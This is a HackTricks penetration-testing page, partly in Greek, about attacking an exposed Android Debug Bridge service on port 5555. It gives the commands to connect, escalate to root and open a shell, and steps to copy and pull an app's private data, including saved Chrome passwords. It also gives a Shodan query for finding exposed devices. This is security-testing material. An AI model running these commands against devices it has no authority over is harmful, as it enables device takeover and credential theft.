hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

From the docs:

Android Debug Bridge (adb) είναι ένα πολυλειτουργικό εργαλείο γραμμής εντολών που σας επιτρέπει να επικοινωνείτε με μια συσκευή. Η εντολή adb διευκολύνει μια ποικιλία ενεργειών της συσκευής, όπως η εγκατάσταση και αποσφαλμάτωση εφαρμογών, και παρέχει πρόσβαση σε ένα Unix shell που μπορείτε να χρησιμοποιήσετε για να εκτελέσετε μια ποικιλία εντολών σε μια συσκευή.

Προεπιλεγμένη θύρα: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Αν βρείτε την υπηρεσία ADB να τρέχει σε μια θύρα μιας συσκευής και μπορείτε να συνδεθείτε σε αυτήν, μπορείτε να αποκτήσετε ένα shell μέσα στο σύστημα:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Για περισσότερες εντολές ADB, ελέγξτε την παρακάτω σελίδα:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Εξαγωγή Δεδομένων Εφαρμογής

Για να κατεβάσετε εντελώς τα δεδομένα μιας εφαρμογής, μπορείτε:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Μπορείτε να χρησιμοποιήσετε αυτό το κόλπο για να ανακτήσετε ευαίσθητες πληροφορίες όπως κωδικούς πρόσβασης του chrome. Για περισσότερες πληροφορίες σχετικά με αυτό, ελέγξτε τις πληροφορίες που παρέχονται στις αναφορές εδώ.

Shodan

• android debug bridge

{% hint style="success" %} Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

{% endhint %}